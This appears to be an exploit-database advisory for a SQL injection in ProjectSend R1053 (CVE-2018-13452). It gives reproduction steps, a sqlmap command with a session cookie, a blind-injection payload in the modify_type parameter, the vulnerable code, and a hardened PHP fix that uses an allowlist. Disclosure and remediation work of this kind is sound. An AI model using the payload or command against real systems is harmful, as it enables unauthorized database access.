ProjectSend - SQL Injection Vulnerability

Published: 29 Jul 2018 00:00:00. Reported by GUIA Brahim Fouad. Type: zdt. Source: 0day.today. 85 views.

SQL Injection in ProjectSend R1053

Related: Packet Storm, "ProjectSend R1053 SQL Injection", published 28 Jul 2018 00:00 (packetstorm).
# Exploit Title: ProjectSend - SQL Injection
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/241/
# Version: R1053
# Tested on: ProjectSend version: R1053, php version: 7.0, MySQL version: 5.7
# CVE : CVE-2018-13452

POC:

1 - you must be logged in
2 - upload a file and get the id of this file
3 - add a relation to this file (assigned to a user)

http://localhost/ProjectSend/manage-files.php?modify_type=<sqli>&action=show&batch[]=<id file>&modify_id=<id file>

sqlmap.py -u "http://localhost/ProjectSend/manage-files.php?modify_type=4&action=show&batch[]=4&modify_id=4" --cookie="PHPSESSID=9jvcf5n4td8kvia6orjkp89mmt;" 

---
Parameter: modify_type (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: modify_type=(SELECT (CASE WHEN (1907=1907) THEN 1907 ELSE 1907*(SELECT 1907 FROM INFORMATION_SCHEMA.PLUGINS) END))&action=show&batch[]=4&modify_id=4
---


Description of the problem:
SQL Injection (unquoted)

File: manage-files.php

The GET parameter 'modify_type' is received in line 134 of the file manage-files.php.

Line| Code
132 | foreach ($selected_files as $work_file) {
133 | $this_file = new FilesActions();
134 | $this_file->change_files_hide_status('1', $work_file, $_GET['modify_type'], $_GET['modify_id']);

The user-supplied data is concatenated directly into the SQL statement at line 180 of the file includes/classes/actions-files.php, in the function change_files_hide_status(). Because it is spliced in as a column name rather than bound as a value, the parameter placeholders in the same statement do not protect it.

The resulting statement is then passed unsanitized to the sensitive operation prepare() at line 181 of the file includes/classes/actions-files.php, in the method FilesActions::change_files_hide_status().

File: includes/classes/actions-files.php

Line| Code
174 | class FilesActions{function change_files_hide_status($change_to, $file_id, $modify_type, $modify_id){
180 | $this->sql = "UPDATE " . TABLE_FILES_RELATIONS . " SET hidden=:hidden WHERE file_id = :file_id AND " . $modify_type . " = :modify_id";
181 | $this->dbh->prepare($this->sql);
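The lines above show the root cause: `$modify_type` is used as a column name, and PDO placeholders can bind values but never identifiers, so the `:modify_id` placeholder on the same line gives no protection to the part an attacker controls. The fix is to check the identifier against a fixed allowlist before it reaches the query string. The following hardened version is an added example written for this page, not ProjectSend's own code; the column names `client_id` and `group_id`, the table name, and the use of an in-memory SQLite database through PDO are assumptions made so the example runs stand-alone.

```php
<?php
// Added example, not ProjectSend's code. It mirrors the shape of
// FilesActions::change_files_hide_status() from the advisory (lines 180-181)
// and fixes the identifier injection with a strict allowlist.
// Table and column names below are assumptions for the example.

const TABLE_FILES_RELATIONS = 'tbl_files_relations';

// The only columns this query may filter on. A request value that is not
// exactly one of these strings is rejected before any SQL is built.
const ALLOWED_MODIFY_TYPES = ['client_id', 'group_id'];

final class FilesActionsHardened
{
    /** @var PDO */
    private $dbh;

    public function __construct(PDO $dbh)
    {
        $this->dbh = $dbh;
    }

    /**
     * Sets the hidden flag on one file relation.
     *
     * @param string $change_to   '0' or '1'
     * @param int    $file_id     file whose relation is modified
     * @param string $modify_type relation column to match; must be allowlisted
     * @param int    $modify_id   value the column must equal
     * @return int number of rows updated
     * @throws InvalidArgumentException when $modify_type is not an allowed column
     */
    public function changeFilesHideStatus($change_to, $file_id, $modify_type, $modify_id)
    {
        // Identifier allowlist with strict comparison: SQL fragments such as
        // the advisory's "(SELECT (CASE WHEN ...))" payload never match.
        if (!in_array($modify_type, ALLOWED_MODIFY_TYPES, true)) {
            // Worth logging on the server side: this only happens when a client
            // sends a modify_type the UI never produces.
            throw new InvalidArgumentException('Unsupported modify_type');
        }

        // $modify_type is now one of a fixed set of literals, so interpolating
        // it is safe; every user-controlled *value* goes through a bound parameter.
        $sql = 'UPDATE ' . TABLE_FILES_RELATIONS
             . ' SET hidden = :hidden WHERE file_id = :file_id AND ' . $modify_type . ' = :modify_id';

        $stmt = $this->dbh->prepare($sql);
        $stmt->bindValue(':hidden', $change_to === '1' ? 1 : 0, PDO::PARAM_INT);
        $stmt->bindValue(':file_id', (int) $file_id, PDO::PARAM_INT);
        $stmt->bindValue(':modify_id', (int) $modify_id, PDO::PARAM_INT);
        $stmt->execute();

        return $stmt->rowCount();
    }
}

// Self-contained demo on an in-memory SQLite database (constructed data).
$dbh = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$dbh->exec('CREATE TABLE ' . TABLE_FILES_RELATIONS
    . ' (file_id INTEGER, client_id INTEGER, group_id INTEGER, hidden INTEGER DEFAULT 0)');
$dbh->exec('INSERT INTO ' . TABLE_FILES_RELATIONS . ' VALUES (4, 4, NULL, 0)');

$actions = new FilesActionsHardened($dbh);

// Legitimate request: allowlisted column, bound values. Prints "1 row(s) updated".
echo $actions->changeFilesHideStatus('1', 4, 'client_id', 4), " row(s) updated\n";

// Request carrying a SQL fragment in modify_type, as in the advisory: rejected
// before prepare() is ever called.
try {
    $actions->changeFilesHideStatus('1', 4, '(SELECT 1)', 4);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The allowlist, not escaping, is the right tool here: there is no quoting function that makes an arbitrary string a safe column name, and the set of columns the feature legitimately needs is small and known at development time. Mapping the request value to a fixed literal also means a rejected `modify_type` is a clear anomaly signal for server-side logging.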

Environment
ProjectSend version: R1053
php version: 7.0
MySQL version: 5.7

#  0day.today [2018-07-30]  #


Vulners record: 29 Jul 2018 00:00 (current). Vulners AI Score: 0.3 (Low risk). 85 views.